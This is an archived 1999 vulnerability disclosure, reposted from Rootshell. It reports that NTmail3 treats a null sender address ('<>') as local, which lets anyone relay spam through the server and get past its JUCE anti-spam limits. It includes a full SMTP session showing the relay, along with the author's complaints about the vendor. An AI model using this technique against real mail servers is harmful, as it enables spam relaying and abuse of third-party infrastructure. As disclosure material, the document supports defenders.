Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Windows Net Apps :: ntmail~1.txt

NTmail3 has a bug allowing anyone to relay e-mail through it.





[ http://www.rootshell.com/ ]

( We at Rootshell have been unable to reproduce this bug with a server
running "v3.03.0017/1d.aabx/SP". )

Date: Tue, 8 Jun 1999 10:07:07 -0400
From: Geo. <georger@ppe.com>
To: news@rootshell.com
Subject: NTmail exploit allows unlimited relay mail

NTmail3 appears to have a small hole that allows anyone to use an NTmail3
server as a relay mail server. Basically here is how it works. NTmail3 is
set to not allow relay (either the TO or FROM address must be local) JUCE (a
$500 antispamming add-on from the makers of NTmail) has been installed and
used to lock the server down from the spammers.

I:>open mail.someisp.net 25

220-Unauthorized Use Prohibited
220 mail.someisp.net WindowsNT SMTP Server v3.03.0017/1.aihl/SP ESMTP ready at Sun, 6 Jun 1999 10:39:30 -0400

helo

250 mail.someisp.net [192.168.0.0]

mail from:<>

250 Ok.

rcpt to:poorsucker@aol.com

250 Ok.

data

354 Start mail input, end with <CRLF>.<CRLF>.

buy my crap

sincerely,
some lame spammer
.

250 Requested mail action Ok.

So the stupid program appears to think that <> is a local address. Not only
that but if you use JUCE (the anti spam addon) and have it set to stop
things with max messages (too many messages and the account gets shut down)
it will give the postmaster notification when an account hits the max
message limit, well <> doesn't cause any notification at all. In fact it
appears to be a sort of special case and may actually get around some of the
other anti spamming features built into NTmail3.

Gordano LTD (the author of NTmail) doesn't appear to care, their response
was "we don't support V3 unless you pay", like I was asking a question or
something... I've even offered to pay them to build me a fixed version but
instead they have asked me to take the discussion elsewhere (instead of
their mailing list). Ok, this is elsewhere <g>.

Gordano's solution is to upgrade to NTmail 4, which costs oh.. about 4x what
you paid for version 3. Also if you purchase version 4 and find it
unacceptable because of other problems (I can't run it because it can't
handle the load that version 3 handles), Gordano will be more than happy to
downgrade you to version 3 (this is how they are trying to retain some new
customers who are totally unsatisfied with the quality of Version 4). So
since they are still selling Version 3 in effect it is my opinion they
should fix the damn thing.

Geo.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH